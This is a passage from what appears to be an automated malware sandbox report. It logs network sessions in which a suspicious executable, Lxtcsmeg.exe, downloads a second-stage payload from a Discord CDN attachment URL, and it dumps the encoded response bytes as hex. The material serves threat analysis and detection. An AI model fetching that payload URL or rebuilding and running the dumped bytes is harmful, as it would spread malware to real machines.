fa 0c b4 ec 69 36 3b be fd 83 e0 5d 16 4b 5c 8e 08 a5 b4 f5 90 19 c3 47 0f f1 d9 14 6c ed af 10 05 69 64 d7 16 28 39 3d f5 cb 59 3c 73 b6 a2 72 fa 10 5a fa 01 1a 41 54 fc 1d ea 78 4a d9 30 10 57 68 ae d5 27 fa 1c 73 22 Data Ascii: "2ZDPd><^b)+_,fgk_<^\g2u`e?){55[\|wf.7f`^{[l:FvchIa$ZiYD0u`HNn1Q(AM"JFwd7i6;]K\Glid(9=Y<srZATxJ0Wh's"
2021-11-25 15:51:21 UTC	392	IN	Data Raw: 77 f5 b6 cb 36 07 75 d2 7a 0c fb d1 65 fd bf 3a 6e 95 bb 5a d1 07 0d 65 5a be aa 6b 69 64 d2 bc d3 6c eb cc b5 49 7b fe 1a 75 e1 f1 cc 8f dc 04 e7 92 dc 98 5b 41 00 dd 86 2c 4b 19 67 5f 4b 19 9c 05 55 29 44 e0 0f 83 c0 cc a9 68 88 50 c3 36 03 3b 85 d8 95 a2 16 66 83 fa 56 b4 a0 2e c1 42 d0 e7 82 22 32 5a be d8 c6 d6 e6 03 64 a8 32 cb 5a ec 2d d3 6d 6e fc 56 b4 a0 6e f0 57 0b 63 be a5 ba 3e 7a 0e 00 db cd 68 e0 0e 72 8e 22 54 dd e3 e5 81 df 3b 60 ce e1 90 4d 62 e7 9e 69 01 32 33 a9 77 fe 2a 5d 46 8c 2e ce e1 90 43 42 b6 a4 78 6c 82 49 7b fe 3a 74 ff db 8d ad 92 4a 96 55 32 5a be b9 2c 9d e6 1d a6 7d f7 fb cb f9 fe 58 b9 49 7d fd b9 43 66 83 d1 01 31 b1 47 76 70 9c 16 61 33 b8 d9 23 ea 3e 78 09 7f ca f4 41 00 89 f2 30 55 32 5a b5 13 af 12 0a 82 41 75 f0 42 Data Ascii: w6uze:nZeZkidlI{u[A,Kg_KU)DhP6;fV.B"2Zd2Z-mnVnWc>zhr"T;`Mbi23w*]F.CBxlI{:tJU2Z,}XI}Cf1Gvpa3#>xA0U2ZAuB
2021-11-25 15:51:21 UTC	408	IN	Data Raw: 66 db 85 a8 82 56 da 96 75 e5 f4 2f bf 3e 7c 11 88 45 64 be bc b0 94 50 d1 06 85 8a 53 48 ff bc dd f5 ac f9 ec 58 cb 36 0c 88 36 66 de 09 00 b3 74 df ec 42 ed c2 e3 f2 55 5d 2a 43 0d 7c 13 f9 a2 1a 3e 1c 46 e2 74 96 26 52 df ab 6e 9e 06 80 3d 91 a6 12 66 db 89 b6 a5 fa 4f 90 65 5e c8 a6 22 57 4d 77 f4 43 05 1b c0 d6 96 53 2c 49 14 0f 83 a5 fa 4f 23 b5 22 32 5e e7 9f eb a9 04 86 10 15 92 4b 7a 20 41 6c 8f b7 55 51 07 1a 6c 88 1e 5c b1 7b bc 80 2b be 94 27 d8 94 39 81 8f b7 4e c7 62 e1 e6 30 61 66 ab 24 40 1a 70 9c 09 5b 22 40 0e 2f a5 9f 8f b0 e5 f5 b0 f5 ed 94 13 8c 3c 4a af 66 b2 fc 69 00 a9 77 aa a7 cd 11 a5 da 98 77 a7 cb 6f 5e fe 61 28 7c 7b f2 49 75 ef 9e 49 77 ee 43 60 a3 90 21 8d db ef c6 b9 41 2d ee 05 5f 26 11 a8 b0 b8 93 e3 a1 d0 a5 da aa c9 13 Data Ascii: fVu/>\|EdPSHX66ftBU]*C\|>Ft&Rn=fOe^"WMwCS,IO#"2^Kz AlUQl\{+'9Nb0af$@p["@/<Jfiwwo^a(\|{IuIwC`!A-_&
2021-11-25 15:51:21 UTC	424	IN	Data Raw: 2c 4b 19 9c 64 ed ae 91 c8 d0 e6 1d a6 cd 5e c8 d2 eb c1 40 7d 96 55 41 6c 9f c5 8a 77 87 ef b3 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 5c c3 45 0a f4 40 7d 96 f5 c2 c3 45 0a ae 91 c8 d2 eb fd 84 64 f9 0c cb 59 7c 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 bd 36 64 d7 7f 9b e1 90 d6 f5 c2 c3 43 55 32 5a df ff ba cb 30 7b d1 58 b9 6c eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 b1 18 19 9c 66 dc 04 e7 1f ab 09 74 ff 40 7d 96 34 2b a8 e6 78 27 7f eb a9 84 27 bf 3b f1 b8 aa 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 fd d6 f5 c2 ca 57 37 e7 9f eb da 8c 5e e6 5d 76 04 a7 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d 92 4b 19 9c 66 dc 04 e7 ff db 81 a0 6f cf 63 55 53 59 5d 22 4a b8 ea 17 97 97 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 5f 4b 19 9c 60 cd 5e c8 82 22 Data Ascii: ,Kd^@}UAlw}U2Z,K\E@}EdY\|,Kdw6dCU2Z0{Xlft@}4+x'';,KdwW7^]vn6dwKfocUSY]"Jw,Kd_K`^"
2021-11-25 15:51:21 UTC	440	IN	Data Raw: 83 e1 e7 9f eb a9 0a 09 8b 46 73 7d 96 17 e6 79 ec 5f 2f 9c 15 fc 36 00 af 61 10 05 69 64 d9 83 5a 41 ff db 81 a0 6e a2 17 e4 4b 7e 69 00 bd 55 70 9b 8c 4f 47 78 7a 0e 00 dd 96 aa 78 f6 ba af 13 8d be ff bf 48 c2 a4 09 10 65 39 ae ff b6 d6 91 bf 48 91 c8 d2 fb 2e af ec d3 6d 6e a6 0c 93 be dd c9 25 d4 92 2f a1 82 6e 94 3c 1d d7 0f 83 a5 fa 5d b9 d3 92 b4 a0 6e f0 67 3b 91 ab 46 fd b8 c8 b6 d7 05 25 de 65 34 2e 28 41 00 dd 97 28 be 46 73 7d 96 55 32 0b 1d d4 84 4b 7d c5 2d bf 5f 2b aa 87 af 13 81 5f b4 5f b4 a0 6e f0 36 0e 64 a6 10 61 3b c3 74 d2 88 5a d5 72 fa 4f 2f 2c b4 5f b4 a0 6e 33 80 f8 c1 1b 4a 7d 69 9a ab a4 91 0b 86 d2 10 7e f0 36 64 d7 68 5b c5 0f 0e 00 9c 20 6c 83 b5 ab 6d 37 be e3 55 01 5f 0f da ff 78 f6 ba b2 81 48 c2 93 32 a5 fa 56 5c 47 4a Data Ascii: Fs}y_/6aidZAnK~iUpOGxzxHe9H.mn%/n<]ng;F%e4.(A(Fs}U2K}-_+__n6da;tZrO/,_n3J}i~6dh[ lm7U_xH2V\GJ
2021-11-25 15:51:21 UTC	456	IN	Data Raw: d1 28 51 28 54 24 37 e7 9f e9 1d a6 3c f0 ae 29 3b 0e 3a fb 39 ec 6d ed 0e b8 b5 57 37 a3 ad 5e cd a1 d0 6f 17 a7 00 b9 2c 0a f3 a3 9d b3 dd b5 ce 6a b3 1d a6 7d b8 aa 87 af 12 f5 3d 09 8b b9 2c 4b 19 f9 b9 5e 9c 64 d7 77 83 5a 41 ff 24 37 e7 9f 8e 32 36 05 2f d3 6d 6e f5 3d 09 8b 46 4f 22 32 1e 70 b9 01 dc c4 43 c6 90 be 52 55 cd 6a a8 6b aa 87 ee 35 42 ea 37 6e 94 09 2d 94 90 75 82 66 84 6b 6c 14 2f 5a da cf 9c 00 dd c7 4b 80 75 d7 b7 14 e3 1e 7d 96 55 cd c9 54 eb ff bb 31 d8 05 ff db c5 1c 43 05 69 9b 74 ff 9f bd 56 b4 a0 91 5c c3 01 09 14 0f 83 5a 2d ce a5 ac ec 2c 4b e6 8f c3 01 09 14 0f 83 5a 2f d3 29 92 2b c9 54 50 35 e2 57 61 30 55 32 a5 55 32 1e 7e 78 09 74 00 73 7d d2 bd 56 b4 a0 91 65 5a fa 19 fc 54 af ec 80 1d e2 45 6a e6 1d 59 97 d7 33 8b d9 Data Ascii: (Q(T$7<);:9mW7^o,j}=,K^dwZA$726/mn=FO"2pCRUjk5B7n-ufkl/ZKu}UT1CitV\Z-,KZ/)+TP5Wa0U2U2~xts}VeZTEjY3
2021-11-25 15:51:21 UTC	472	IN	Data Raw: d2 ac dc 04 a6 fc f8 4a 96 55 32 5a fa 08 6d 6e b1 99 6c eb a9 04 e7 9f af 5b 79 8c 7d 17 23 b5 22 32 5a be fd 9e a9 04 a6 fc ec 2c 4b 19 9c 64 93 85 4e a0 2f 52 16 14 0f 83 a5 fa 0b 3e 84 27 fe d8 3a 6e f0 36 64 d7 33 9a 1b a1 b1 99 18 19 9c 64 d7 77 c3 02 26 3c 32 db 49 14 0f 83 a5 fa 0b 31 c0 be f8 cb 95 d2 eb a9 04 e7 db c9 04 e7 de 88 e1 90 46 8c 3c 73 39 a4 68 e1 d1 e9 70 f5 c2 c3 45 0a b2 dc b0 96 14 8e 99 dc 04 e7 9f eb ed e6 01 5f 0a 77 5b 41 00 dd 86 2c 0f cb cd 5e 89 35 02 e2 13 8d be b9 68 a6 35 e2 52 2b 2d ce e1 90 46 8c 78 4e 1c 23 f4 c1 a8 82 22 32 5a be fd 91 1c 23 f4 c1 ac 8c 3c 73 7d 96 11 c0 da ff 9a de f9 cc dc 04 e7 9f af 5b d9 7c 52 2b 3d f6 45 0a f6 45 4e e8 82 22 73 fc ac 8c 3c 73 7d 96 11 c0 82 22 73 fc a8 82 22 32 5a be fd 91 4c Data Ascii: JU2Zmnl[y}#"2Z,KdN/R>':n6d3dw&<2I1F<s9hpE_w[A,^5h5R+-FxN#"2Z#<s}[\|R+=EEN"s<s}"s"2ZL
2021-11-25 15:51:21 UTC	488	IN	Data Raw: d8 f5 26 bc b0 7e d8 3e f0 d1 42 c6 47 94 50 a5 fa 46 36 67 24 ba 47 7a d1 90 03 9b e1 d1 e9 d8 4d c4 c1 34 1e 28 b7 62 25 dc 9f 1d db 5c 58 60 15 92 0a 77 f7 68 3a 92 36 ef 4f fa 14 f0 c9 fe f7 2f 2f 8e ca 84 c6 14 f7 82 09 74 ff db 93 75 7a 4b 90 06 fc ac 4d 1e 28 0c eb 69 0d 7e 18 26 c3 68 cf b8 aa 87 af de e0 0e 03 27 79 5e f9 8c 3f 8f 43 05 69 64 d3 13 0c f2 4e a0 50 26 2d ba 2f d3 6b 2f 24 51 0a 83 a5 fa 30 aa ba b1 6c eb a9 7b 6e d5 b0 1f a3 b3 96 33 dd 86 2d 38 80 1d a6 7d 93 25 ba af 11 88 d8 fa 4f 22 03 8c 36 10 05 90 c6 cd 5e c8 d2 17 d2 2c 9d 6f b0 1f f8 1c 74 1f 6f f0 da 74 aa 17 97 db 43 58 5c 48 b8 8e 61 7a 26 15 b8 8a 13 a5 ba 8b 99 f1 92 0b 53 00 fd f2 7b bc 9e 49 30 15 bf 1f 8b 93 8d 94 70 d1 45 4a b2 bb 1b 8c 7c 53 00 f9 e6 5d 06 c8 ff Data Ascii: &~>BGPF6g$GzM4(b%\X`wh:6O//tuzKM(i~&h'y^?CidNP&-/k/$Q0l{n3-8}%O"6^,ototCX\Haz&S{I0pEJ\|S]
2021-11-25 15:51:21 UTC	503	IN	Data Raw: cf e8 dd 79 6e 3b 19 9a d4 d4 e4 93 04 e4 d0 6d ad 85 a8 ff 03 5f 5f 35 22 b7 d8 05 96 56 5c c5 c1 64 d3 e4 e7 60 30 2c a3 36 ef 9a 21 6b ec 08 f5 4b d9 4f d3 e6 c7 c4 99 8a 64 d7 37 6a e6 19 5e 95 89 ea 78 f6 ba 51 86 c4 59 34 12 81 76 07 bc b7 f4 cb 9e e2 11 f5 3a 55 f1 93 c5 a1 30 66 d8 87 50 20 f5 49 16 69 a7 c4 83 a2 98 81 93 c9 29 c5 b1 9b 1e d7 88 6c 03 a2 f8 ba 24 ed 25 43 8e 16 42 d1 84 ac d9 7c 53 a0 ad 55 6c b4 79 b5 44 97 3c b2 8b 50 64 de 7c ca ee 57 6d 61 bb e1 b9 d0 a0 e5 8c d7 a7 d6 09 23 3e 65 b1 d8 fb f0 43 dc 3d 90 59 b7 41 0e 8b df 80 69 66 3e fb 8b bd f1 3b f5 04 64 d1 83 47 7a 44 8f 04 64 df 4d 9d d2 9e b0 af 17 c8 59 38 27 34 4a e2 59 7d e3 4c a2 6c 60 c3 ce c7 3b f3 57 f6 17 55 33 df fc 84 0e fc 03 ef 4f 65 d1 3c 07 91 4d 4f 57 c1 Data Ascii: yn;m__5"V\d`0,6!kKOd7j^xQY4v:U0fP Ii)l$%CB\|SUlyD<Pd\|Wma#>eC=YAif>;dGzDdMY8'4JY}Ll`;WU3Oe<MOW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49763	162.159.130.233	443	C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 15:51:48 UTC	518	OUT	GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-11-25 15:51:48 UTC	519	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 15:51:48 GMT Content-Type: application/octet-stream Content-Length: 455680 Connection: close CF-Ray: 6b3c0a5fe94c4e31-FRA Accept-Ranges: bytes Age: 105703 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Lxtcsmegwxhfqoabkjaduxyckamobho ETag: "8242fb2442748493aa1d31dda471d43a" Expires: Fri, 25 Nov 2022 15:51:48 GMT Last-Modified: Wed, 24 Nov 2021 08:13:21 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1637741601530592 x-goog-hash: crc32c=lwQmpg== x-goog-hash: md5=gkL7JEJ0hJOqHTHdpHHUOg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 455680 X-GUploader-UploadID: ADPycdututbtUcRl5WSW_hry_FIQngXAEOTvsF_C9upp3XZeadVl41eP9j6KorcCz-oWIrYx9Hq0o2OS5hKBDlbxS2aeJWKHkw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-11-25 15:51:48 UTC	520	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 56 55 72 64 35 62 55 6a 49 75 7a 6f 62 6c 70 6d 65 4a 53 6d 51 38 74 64 32 53 44 33 67 38 6d 69 71 38 76 7a 7a 42 75 75 41 79 52 37 35 4d 53 73 49 39 6e 38 73 44 54 70 71 4f 77 4f 43 72 36 34 31 32 4c 44 35 56 59 44 32 64 71 78 73 64 6a 4c 65 72 50 42 52 61 79 57 43 79 68 50 6e 4d 4c 35 5a 4a 35 44 6c 6b 6a 73 69 75 38 4d 61 4b 44 57 6b 33 5a 6e 67 53 6d 46 79 33 42 31 77 4f 7a 4e 62 33 7a 45 31 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VUrd5bUjIuzoblpmeJSmQ8td2SD3g8miq8vzzBuuAyR75MSsI9n8sDTpqOwOCr6412LD5VYD2dqxsdjLerPBRayWCyhPnML5ZJ5Dlkjsiu8MaKDWk3ZngSmFy3B1wOzNb3zE1Q%3D%3D"}],"group":"cf-nel","max_age":604800
2021-11-25 15:51:48 UTC	520	IN	Data Raw: 06 a2 3a 2a 02 a3 a5 a2 2b 8e 0f ca 93 89 f5 92 0c b5 6b 2d 8a 76 54 f7 9f ac c2 8a 73 39 ad 5e 8f 8d f7 83 e1 d1 38 31 80 5a f0 7f df cf 22 62 95 9c 2d 8a 73 3c 23 ed f6 02 ac c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 Data Ascii: :*+k-vTs9^81Z"b-s<#DrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yD
2021-11-25 15:51:48 UTC	521	IN	Data Raw: bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b Data Ascii: Wfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/k
2021-11-25 15:51:48 UTC	523	IN	Data Raw: 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d Data Ascii: ,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWf
2021-11-25 15:51:48 UTC	524	IN	Data Raw: 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c Data Ascii: fTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,
2021-11-25 15:51:48 UTC	525	IN	Data Raw: 65 84 2f 3b ad c5 b7 7f 47 1f 15 35 b2 c7 f5 8d dc be 7a 1e b9 e0 a2 c0 be 20 83 f1 1c fb d2 5d f0 66 4e 7a 67 d9 c8 b6 1c 91 ad d2 49 e1 93 c5 3d 9c 3c 1b 1f 73 6d d0 5f 5f f1 19 8e ff 1d 08 23 d9 c2 72 a0 c3 fe 3a c8 92 26 96 8c 69 ba 69 d1 77 53 17 f1 29 7d 41 ba 62 6a e9 03 dd 53 90 f8 22 8f df 0d b7 90 99 11 52 1a 4d ba 96 04 5c c3 23 d6 9d 31 76 96 ee d8 ef 16 e6 40 c6 35 f4 e1 6e 95 73 ac d3 2a 51 7e b1 f7 a3 46 4c cb e6 24 5e 61 e7 c3 11 d9 cc de 96 1a ba 57 69 ca 67 33 68 54 74 ea 7c a7 45 56 11 2e 35 53 e1 f8 98 f9 6e e0 d8 2b 0d 76 72 12 53 44 39 84 af 76 a6 df eb 2c ec 72 40 bc eb 38 b5 4c 3b 49 78 b2 c7 df 09 24 56 fd 77 ee 51 11 54 c1 21 85 18 4e 96 42 e4 43 3a 3b b5 f2 57 0e 02 bd 5b 04 d5 7f f7 a3 bf a5 54 ee 70 eb 7a a1 40 1d 1d 9c c0 f5 Data Ascii: e/;G5z ]fNzgI=<sm__#r:&iiwS)}AbjS"RM\#1v@5ns*Q~FL$^aWig3hTt\|EV.5Sn+vrSD9v,r@8L;Ix$VwQT!NBC:;W[Tpz@
2021-11-25 15:51:48 UTC	527	IN	Data Raw: 69 8c 1c 44 e4 6d 49 66 51 11 37 01 0a 96 08 04 68 6e 51 16 a8 2c 2b 95 84 e7 0d f8 bf 04 43 b3 71 21 e0 96 ce 66 2f 94 e8 98 7a 53 44 e2 7a 55 57 0a 5f e6 47 66 83 05 51 6e 5d 01 f0 84 73 29 a0 ba 3e f1 5f 34 f5 b0 fd b4 c5 2e 78 7f 4c d1 dd f6 24 65 07 f4 5f 51 65 69 d1 4e 80 7a 6d 35 ea 3a 31 e1 2f f7 92 2b 94 7e e4 e4 00 e3 29 e7 ff 87 f9 27 b8 b9 5a 81 04 c4 a4 21 e0 da 76 91 27 f8 f2 1c 03 39 85 30 89 7e 8a 0a 5f 33 87 c6 92 2e 0e 6c b2 dc ab 36 30 01 3b 2f 95 ec 5e b7 8d 86 47 6d 0b 8a b3 89 10 4f 96 6b 08 a3 a8 54 e1 d9 0b 4a 23 f7 e7 f8 29 5b 90 82 b8 93 72 ba fa 2f 8e 65 2d b9 b0 a8 3e 3f 9b bd 60 9e 08 a4 2d f1 1c 6c 87 f6 15 a4 06 c8 50 e2 ab 4a b6 f8 23 d5 2b a2 2b f4 e9 b1 42 eb f6 da 22 fd 4b 5e 67 55 66 88 55 47 a1 46 45 75 28 4a fd b4 c5 Data Ascii: iDmIfQ7hnQ,+Cq!f/zSDzUW_GfQn]s)>_4.xL$e_QeiNzm5:1/+~)'Z!v'90~_3.l60;/^GmOkTJ#)[r/e->?`-lPJ#++B"K^gUfUGFEu(J
2021-11-25 15:51:48 UTC	528	IN	Data Raw: 61 ec 55 50 f9 9a 23 55 c6 f0 09 d0 9f 85 f3 ed 8f 7b 35 7a 49 ac a3 a4 25 d3 48 bc cd c5 77 2e 20 75 eb f6 dd 89 a9 19 db 2e 77 d1 3c 17 21 48 71 58 c6 67 6f 1e 4a f3 25 ab 08 f5 88 84 11 d7 25 e7 34 14 70 4f 10 b0 dc 55 55 51 ea a4 ee cb 60 72 b2 c8 b2 c6 87 4f c3 45 34 e3 aa e5 c6 9b 42 38 c7 2f ec 88 76 6a bf 6b 8c 38 71 5a f9 74 b4 f1 e5 f3 bb 85 08 c1 7d 3f c5 12 63 0a f4 39 c5 f0 71 d7 34 09 20 49 2a ad fd d0 99 76 07 03 06 89 da 2e 91 e6 57 82 23 ea 75 df e6 40 27 ee 02 57 22 63 32 39 74 f0 2c 70 cc 63 46 df eb f4 30 bd de 48 af af 01 3d aa d1 cd a6 91 a3 ca 73 6f 1d ff 8b a8 ae e7 35 a5 42 94 01 02 8b 79 d4 9e 33 e0 a7 f6 1d cf 3c 7c 55 0a 04 a0 c1 1d f0 62 b6 1c d4 1f b5 5d ec 7a 63 37 82 db 07 f8 ea 6d db dd d9 2e 0d 84 a0 ec f4 73 c8 b2 cf 04 Data Ascii: aUP#U{5zI%Hw. u.w<!HqXgoJ%%4pOUUQ`rOE4B8/vjk8qZt}?c9q4 I*v.W#u@'W"c29t,pcF0H=so5By3<\|Ub]zc7m.s
2021-11-25 15:51:48 UTC	529	IN	Data Raw: 94 17 2f e0 55 6f 1a 98 44 7c 68 dc ad 38 3f 92 14 13 d1 cf 8e 06 43 4e f8 1e 4c 42 3f 2e 41 7f 31 94 0f e1 f5 52 84 e7 7d dc b1 52 c7 1d fb bc 3d e6 29 f7 72 e7 c4 af 70 af 2b fb 4a af ac 97 8e 21 ed 8b 4f 5c 7f a5 46 86 40 21 e6 64 b1 99 c3 7a aa 8d de 50 f5 97 65 c4 4b 5e 70 eb f2 66 b5 15 e9 91 5d 7b 38 68 b7 4e ff ee c5 27 e4 5f e4 0e 58 ed ca 03 d4 2c 50 da 55 2d 91 aa e2 8c f2 01 e0 44 32 0e 6d 3c 2e 2a 79 7d b1 2b 7c 7b ca b0 f5 c6 ab 6f 16 2d 71 1e 71 18 44 a3 e9 40 de 37 5b 1c 4e fc 02 d1 3a 73 87 90 e2 76 65 03 34 5a 82 75 eb ee 89 dd d8 a7 96 9e 97 4f 18 24 9e 35 b1 71 27 0b 19 b0 a9 43 aa e6 44 d3 09 07 bc 27 2e 2f 79 4f 41 62 b7 0d ae f5 ea 6d db 40 11 da a2 f7 c4 79 d3 5e 7d 43 5b 26 5f a5 f4 15 e6 24 88 e2 4b 79 d1 e2 05 d4 90 78 b5 a3 98 Data Ascii: /UoD\|h8?CNLB?.A1R}R=)rp+J!O\F@!dzPeK^pf]{8hN'_X,PU-D2m<.*y}+\|{o-qqD@7[N:sve4ZuO$5q'CD'./yOAbm@y^}C[&_$Kyx
2021-11-25 15:51:48 UTC	531	IN	Data Raw: 4a 9e 2e ff c5 10 51 4c 69 70 91 e1 ef 19 8b d8 98 3f ab 43 4a 6f 39 59 21 db d3 30 4a 8c f6 5b 72 4f 22 6f 14 6c f6 6a f1 c7 76 bb 5f 1c 43 58 88 ae 73 d2 d5 ce b4 ce bd 60 d6 90 6f 75 bd 92 16 76 5d 16 16 e8 56 3c 34 e7 ce b1 45 63 79 f3 91 53 10 ac d8 a3 9c 3b 73 e0 9d 7d d1 c7 26 6f 27 db 03 15 e8 67 20 87 c5 26 5e ad 44 66 af 86 66 69 0c 99 8e 1c bc 83 07 9e 5a 0b a4 28 26 5f 36 24 85 c6 f4 ff 00 8b d9 21 c1 03 d6 f3 83 19 56 eb f5 94 8a 30 3a e0 31 7c d9 17 ce b1 b9 5c 9b f0 71 c0 33 8d e3 fc 06 fb c2 48 ac 25 28 18 70 aa d8 28 04 56 f3 12 8f 90 12 6e 73 2e f7 02 9d 4c 17 fb b3 78 a5 fa f1 4a dc b1 8e 23 e7 c2 62 f1 ac 2f e0 bb bb 61 37 84 ee 8c 17 a9 3d 49 90 10 65 07 7f f6 32 40 43 b9 b1 47 53 7b 99 ef 88 12 35 46 29 af 4a c6 02 53 df 2c 0c 43 ac Data Ascii: J.QLip?CJo9Y!0J[rO"oljv_CXs`ouv]V<4EcyS;s}&o'g &^DffiZ(&_6$!V0:1\|\q3H%(p(Vns.LxJ#b/a7=Ie2@CGS{5F)JS,C
